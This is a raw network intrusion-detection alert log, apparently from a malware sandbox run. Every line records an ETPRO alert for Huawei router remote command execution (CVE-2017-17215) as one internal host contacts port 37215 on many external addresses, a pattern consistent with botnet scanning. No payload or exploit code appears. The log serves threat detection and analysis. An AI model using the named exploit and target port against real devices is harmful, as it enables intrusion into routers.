                                                        06/13/24-21:33:04.994206TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4367237215192.168.2.1441.198.139.131
                                                        06/13/24-21:32:23.833840TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6038637215192.168.2.1441.17.251.190
                                                        06/13/24-21:32:01.248788TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4400037215192.168.2.14156.152.121.102
                                                        06/13/24-21:32:42.404201TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4852037215192.168.2.14156.206.197.194
                                                        06/13/24-21:33:09.130149TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3731237215192.168.2.14197.212.178.143
                                                        06/13/24-21:32:25.974525TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5172437215192.168.2.14197.185.0.96
                                                        06/13/24-21:33:07.041769TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4262237215192.168.2.14197.9.101.12
                                                        06/13/24-21:32:21.784374TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5411237215192.168.2.14197.28.188.211
                                                        06/13/24-21:32:07.404513TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3818037215192.168.2.1441.99.139.8
                                                        06/13/24-21:32:38.296874TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4197037215192.168.2.14197.63.192.113
                                                        06/13/24-21:32:48.550025TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5313437215192.168.2.1441.125.23.190
                                                        06/13/24-21:31:59.198718TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3293837215192.168.2.14197.171.201.221
                                                        06/13/24-21:31:59.177545TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4849637215192.168.2.14156.99.248.102
                                                        06/13/24-21:32:50.614305TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4854837215192.168.2.1441.190.120.2
                                                        06/13/24-21:31:59.198018TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4354037215192.168.2.14197.122.188.250
                                                        06/13/24-21:32:56.757740TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4085237215192.168.2.14197.127.77.241
                                                        06/13/24-21:32:23.832376TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3557837215192.168.2.14156.49.112.79
                                                        06/13/24-21:32:32.166742TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4621637215192.168.2.14197.25.124.31
                                                        06/13/24-21:32:54.711691TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3706037215192.168.2.14197.132.244.196
                                                        06/13/24-21:32:30.100743TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5373037215192.168.2.14197.159.221.54
                                                        06/13/24-21:32:48.550707TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5089237215192.168.2.1441.15.103.202
                                                        06/13/24-21:32:19.751384TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6017837215192.168.2.14197.84.23.59
                                                        06/13/24-21:33:02.953922TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5075037215192.168.2.14197.211.13.95
                                                        06/13/24-21:32:50.633389TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4524437215192.168.2.1441.83.65.105
                                                        06/13/24-21:32:28.044860TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4436037215192.168.2.1441.250.53.222
                                                        06/13/24-21:32:32.150677TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3858637215192.168.2.14197.106.190.28
                                                        06/13/24-21:32:42.403266TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4148237215192.168.2.1441.39.9.122
                                                        06/13/24-21:32:40.355610TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3959237215192.168.2.14197.112.166.234
                                                        06/13/24-21:33:15.272355TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3861837215192.168.2.14197.229.139.168
                                                        06/13/24-21:32:15.629918TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5136837215192.168.2.1441.52.135.204
                                                        06/13/24-21:33:00.886075TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3694237215192.168.2.14197.40.126.249
                                                        06/13/24-21:32:40.379403TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3909637215192.168.2.14197.125.140.50
                                                        06/13/24-21:33:09.109077TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5233037215192.168.2.14156.144.120.38
                                                        06/13/24-21:32:52.655392TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5788837215192.168.2.14156.10.52.196
                                                        06/13/24-21:32:56.791341TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3383237215192.168.2.14197.37.1.84
                                                        06/13/24-21:32:05.344723TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5113237215192.168.2.14156.51.153.63
                                                        06/13/24-21:32:25.973162TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4247437215192.168.2.1441.185.200.112
                                                        06/13/24-21:32:03.279062TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3597837215192.168.2.14156.217.252.15
                                                        06/13/24-21:32:01.223635TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4591637215192.168.2.1441.79.12.106
                                                        06/13/24-21:32:25.994014TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4862437215192.168.2.14197.44.62.194
                                                        06/13/24-21:32:54.724904TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3483237215192.168.2.14156.2.102.213
                                                        06/13/24-21:31:57.154636TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4017837215192.168.2.1441.59.199.97
                                                        06/13/24-21:33:09.130581TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3483037215192.168.2.1441.248.142.250
                                                        06/13/24-21:32:23.831043TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5748837215192.168.2.14197.157.76.196
                                                        06/13/24-21:33:11.158116TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3490637215192.168.2.14156.41.195.39
                                                        06/13/24-21:33:15.256231TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5258837215192.168.2.1441.113.46.137
                                                        06/13/24-21:33:00.871608TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4610837215192.168.2.1441.188.19.123
                                                        06/13/24-21:32:40.354882TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4839637215192.168.2.14156.114.28.203
                                                        06/13/24-21:32:32.152371TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4426637215192.168.2.1441.119.64.227
                                                        06/13/24-21:33:17.340375TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3379437215192.168.2.1441.149.241.15
                                                        06/13/24-21:32:01.220444TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4425437215192.168.2.1441.51.209.51
                                                        06/13/24-21:33:02.914394TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3806437215192.168.2.1441.8.50.234
                                                        06/13/24-21:31:59.174684TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5684637215192.168.2.14156.228.20.155
                                                        06/13/24-21:32:25.996197TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4891837215192.168.2.14156.98.162.187
                                                        06/13/24-21:32:44.455258TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3819637215192.168.2.14156.102.148.47
                                                        06/13/24-21:32:30.098483TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5874037215192.168.2.1441.123.49.243
                                                        06/13/24-21:32:38.303991TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5402237215192.168.2.1441.34.110.146
                                                        06/13/24-21:33:17.310330TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3930037215192.168.2.14156.239.187.100
                                                        06/13/24-21:32:23.937931TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4300637215192.168.2.14156.198.105.51
                                                        06/13/24-21:33:15.257206TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4650237215192.168.2.14156.182.75.170
                                                        06/13/24-21:33:09.111721TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3292237215192.168.2.1441.216.173.190
                                                        06/13/24-21:33:11.181046TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4041637215192.168.2.14156.172.103.100
                                                        06/13/24-21:33:07.042221TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5902237215192.168.2.14156.12.117.142
                                                        06/13/24-21:33:13.227634TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5056637215192.168.2.14197.144.183.201
                                                        06/13/24-21:32:11.484604TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3698237215192.168.2.14197.216.16.182
                                                        06/13/24-21:32:48.566928TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4935437215192.168.2.14156.71.218.55
                                                        06/13/24-21:32:15.603671TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4003837215192.168.2.14197.78.234.76
                                                        06/13/24-21:33:02.952296TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5739237215192.168.2.14197.234.160.138
                                                        06/13/24-21:33:15.258135TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4169037215192.168.2.14156.66.169.160
                                                        06/13/24-21:32:30.075934TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4206237215192.168.2.14197.24.199.185
                                                        06/13/24-21:32:44.477743TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4722237215192.168.2.1441.20.98.110
                                                        06/13/24-21:32:21.783269TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4780837215192.168.2.14156.227.194.40
                                                        06/13/24-21:32:52.658189TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3628237215192.168.2.14156.60.71.13
                                                        06/13/24-21:32:21.782258TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3946837215192.168.2.14156.58.14.186
                                                        06/13/24-21:32:17.694954TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4262637215192.168.2.1441.109.101.34
                                                        06/13/24-21:31:57.091458TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6033437215192.168.2.14197.115.185.232
                                                        06/13/24-21:32:15.638233TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5105837215192.168.2.14197.142.187.146
                                                        06/13/24-21:32:11.487674TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5669837215192.168.2.14156.164.54.241
                                                        06/13/24-21:31:59.175424TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3428437215192.168.2.14197.3.237.232
                                                        06/13/24-21:32:01.220772TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3355037215192.168.2.1441.122.183.100
                                                        06/13/24-21:33:00.884860TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4825037215192.168.2.1441.225.84.32
                                                        06/13/24-21:33:09.129386TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3920437215192.168.2.14156.89.232.8
                                                        06/13/24-21:32:11.507598TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3446037215192.168.2.14156.30.203.194
                                                        06/13/24-21:32:52.678434TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3734037215192.168.2.14156.238.18.40
                                                        06/13/24-21:32:46.509285TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6020037215192.168.2.1441.10.50.23
                                                        06/13/24-21:32:30.128690TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5703437215192.168.2.1441.6.251.247
                                                        06/13/24-21:32:38.296425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5583237215192.168.2.1441.157.104.35
                                                        06/13/24-21:32:58.841937TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3762237215192.168.2.14197.59.47.169
                                                        06/13/24-21:33:07.039244TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4521837215192.168.2.1441.154.169.39
                                                        06/13/24-21:32:56.754426TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3414037215192.168.2.1441.23.43.98
                                                        06/13/24-21:33:02.912424TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3558037215192.168.2.1441.113.74.5
                                                        06/13/24-21:32:13.569653TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5164037215192.168.2.1441.93.38.43
                                                        06/13/24-21:32:21.785369TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4419637215192.168.2.14156.158.116.152
                                                        06/13/24-21:33:11.160004TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3364637215192.168.2.14156.76.8.109
                                                        06/13/24-21:32:30.078101TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5093437215192.168.2.14197.50.212.222
                                                        06/13/24-21:32:03.274149TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4728037215192.168.2.1441.139.66.154
                                                        06/13/24-21:33:15.253384TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4500237215192.168.2.14156.174.19.200
                                                        06/13/24-21:32:48.551910TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3887037215192.168.2.1441.97.252.96
                                                        06/13/24-21:31:57.091744TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3974437215192.168.2.1441.82.238.206
                                                        06/13/24-21:33:04.989369TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4889637215192.168.2.14156.225.52.81
                                                        06/13/24-21:32:38.316666TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5058237215192.168.2.14156.233.66.159
                                                        06/13/24-21:33:02.936277TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5949437215192.168.2.1441.226.173.212
                                                        06/13/24-21:33:09.130037TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4848637215192.168.2.1441.69.163.107
                                                        06/13/24-21:32:25.969306TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4110837215192.168.2.14156.11.132.221
                                                        06/13/24-21:33:00.888164TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3550437215192.168.2.1441.227.228.146
                                                        06/13/24-21:33:09.112372TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4665237215192.168.2.1441.103.165.181
                                                        06/13/24-21:33:02.913653TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4743237215192.168.2.14156.47.40.135
                                                        06/13/24-21:33:13.214549TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5654237215192.168.2.1441.226.162.161
                                                        06/13/24-21:32:05.371112TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4737837215192.168.2.1441.101.23.157
                                                        06/13/24-21:33:15.252987TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3733237215192.168.2.14156.81.76.80
                                                        06/13/24-21:32:52.658121TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3824437215192.168.2.14197.132.149.244
                                                        06/13/24-21:32:09.440202TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3336837215192.168.2.14156.77.205.138
                                                        06/13/24-21:32:13.564084TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4920637215192.168.2.1441.85.113.43
                                                        06/13/24-21:32:44.453901TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4946037215192.168.2.14197.216.99.35
                                                        06/13/24-21:31:57.092806TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6057637215192.168.2.14197.151.100.125
                                                        06/13/24-21:32:30.073682TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5200237215192.168.2.14197.20.27.106
                                                        06/13/24-21:32:44.454593TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3439837215192.168.2.14197.85.178.19
                                                        06/13/24-21:32:25.996387TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5258237215192.168.2.14197.27.108.95
                                                        06/13/24-21:33:09.088008TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4333237215192.168.2.1441.92.80.183
                                                        06/13/24-21:32:34.192616TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3345237215192.168.2.1441.238.9.37
                                                        06/13/24-21:32:11.505597TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5349637215192.168.2.1441.118.104.218
                                                        06/13/24-21:32:11.487300TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4743037215192.168.2.1441.176.236.167
                                                        06/13/24-21:32:58.843923TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3512237215192.168.2.1441.160.214.143
                                                        06/13/24-21:32:36.248669TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3439437215192.168.2.14197.220.176.227
                                                        06/13/24-21:32:21.783114TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4183237215192.168.2.1441.253.101.201
                                                        06/13/24-21:32:40.354155TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4519837215192.168.2.14197.26.208.101
                                                        06/13/24-21:33:09.090963TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5234237215192.168.2.14156.223.90.25
                                                        06/13/24-21:33:04.990384TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5338637215192.168.2.14156.30.46.178
                                                        06/13/24-21:32:13.546598TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4993637215192.168.2.1441.63.248.195
                                                        06/13/24-21:33:02.914115TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4322437215192.168.2.14197.57.232.34
                                                        06/13/24-21:32:13.547499TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5370837215192.168.2.14156.148.171.143
                                                        06/13/24-21:32:58.824839TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4019237215192.168.2.14197.11.134.144
                                                        06/13/24-21:32:09.438524TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4861037215192.168.2.14197.27.55.26
                                                        06/13/24-21:32:30.098143TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5827837215192.168.2.14156.183.89.253
                                                        06/13/24-21:32:25.974480TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5376637215192.168.2.14197.245.231.178
                                                        06/13/24-21:32:40.356450TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5947837215192.168.2.1441.106.157.150
                                                        06/13/24-21:32:46.528114TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3448437215192.168.2.1441.183.27.100
                                                        06/13/24-21:33:15.255789TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4414837215192.168.2.1441.75.18.17
                                                        06/13/24-21:32:40.375947TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4693637215192.168.2.1441.174.237.3
                                                        06/13/24-21:32:03.305848TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4427837215192.168.2.14197.184.21.96
                                                        06/13/24-21:32:09.439045TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4820037215192.168.2.14156.105.140.176
                                                        06/13/24-21:33:09.088187TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4432037215192.168.2.14197.25.43.174
                                                        06/13/24-21:32:32.153460TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4271837215192.168.2.14197.54.223.123
                                                        06/13/24-21:32:34.200207TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5286037215192.168.2.1441.66.14.253
                                                        06/13/24-21:32:54.710552TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4580637215192.168.2.1441.84.216.151
                                                        06/13/24-21:33:15.271084TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3379637215192.168.2.14197.99.86.150
                                                        06/13/24-21:32:13.546764TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4095037215192.168.2.14197.167.134.65
                                                        06/13/24-21:32:42.409761TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4038437215192.168.2.14156.254.198.76
                                                        06/13/24-21:32:34.214230TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5452837215192.168.2.14156.148.238.100
                                                        06/13/24-21:31:59.176590TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4428637215192.168.2.14156.195.196.140
                                                        06/13/24-21:32:03.308357TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3967037215192.168.2.1441.188.192.12
                                                        06/13/24-21:33:09.128771TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5110037215192.168.2.14197.34.60.94
                                                        06/13/24-21:33:15.271952TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4388437215192.168.2.14156.141.116.24
                                                        06/13/24-21:32:42.422589TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4821837215192.168.2.1441.102.92.137
                                                        06/13/24-21:33:02.949848TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4124237215192.168.2.14156.207.203.151
                                                        06/13/24-21:33:00.869718TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4877437215192.168.2.1441.237.126.45
                                                        06/13/24-21:33:13.214380TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5523237215192.168.2.14197.108.145.170
                                                        06/13/24-21:32:34.192095TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3741237215192.168.2.14156.135.220.133
                                                        06/13/24-21:32:58.843688TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4734237215192.168.2.14197.74.63.182
                                                        06/13/24-21:32:28.044785TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5295037215192.168.2.14197.121.2.93
                                                        06/13/24-21:32:42.419623TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5387837215192.168.2.14197.23.101.161
                                                        06/13/24-21:31:59.175975TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4244637215192.168.2.14197.192.232.136
                                                        06/13/24-21:32:01.221170TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4648237215192.168.2.14197.86.184.4
                                                        06/13/24-21:32:07.417751TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3503037215192.168.2.14156.78.229.213
                                                        06/13/24-21:31:59.197560TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4035237215192.168.2.14197.180.35.86
                                                        06/13/24-21:33:15.275775TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4043637215192.168.2.14156.82.49.248
                                                        06/13/24-21:32:54.727062TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5230037215192.168.2.1441.186.94.227
                                                        06/13/24-21:32:36.244209TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5794837215192.168.2.14197.1.132.63
                                                        06/13/24-21:33:07.042688TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3555837215192.168.2.1441.228.40.127
                                                        06/13/24-21:31:57.133506TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3855437215192.168.2.1441.103.81.12
                                                        06/13/24-21:33:13.231551TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5595837215192.168.2.14156.72.100.103
                                                        06/13/24-21:33:13.230449TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6054437215192.168.2.14156.233.76.58
                                                        06/13/24-21:32:23.833894TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5616437215192.168.2.1441.223.20.15
                                                        06/13/24-21:32:05.349281TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5262037215192.168.2.14156.64.69.159
                                                        06/13/24-21:32:28.028699TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4734037215192.168.2.14197.73.35.5
                                                        06/13/24-21:32:15.635162TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3699237215192.168.2.14197.87.187.90
                                                        06/13/24-21:33:15.273578TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4516437215192.168.2.1441.147.21.54
                                                        06/13/24-21:32:54.711163TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3929837215192.168.2.14197.163.254.154
                                                        06/13/24-21:32:58.822239TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5129837215192.168.2.14156.52.151.179
                                                        06/13/24-21:32:56.755361TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4019037215192.168.2.14197.90.95.235
                                                        06/13/24-21:32:48.568166TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5214437215192.168.2.1441.88.166.117
                                                        06/13/24-21:33:04.993880TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3341237215192.168.2.14156.240.30.13
                                                        06/13/24-21:32:17.672455TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4476237215192.168.2.1441.40.229.7
                                                        06/13/24-21:32:01.247801TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3432837215192.168.2.14197.218.104.23
                                                        06/13/24-21:33:15.270996TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4012637215192.168.2.14197.57.62.154
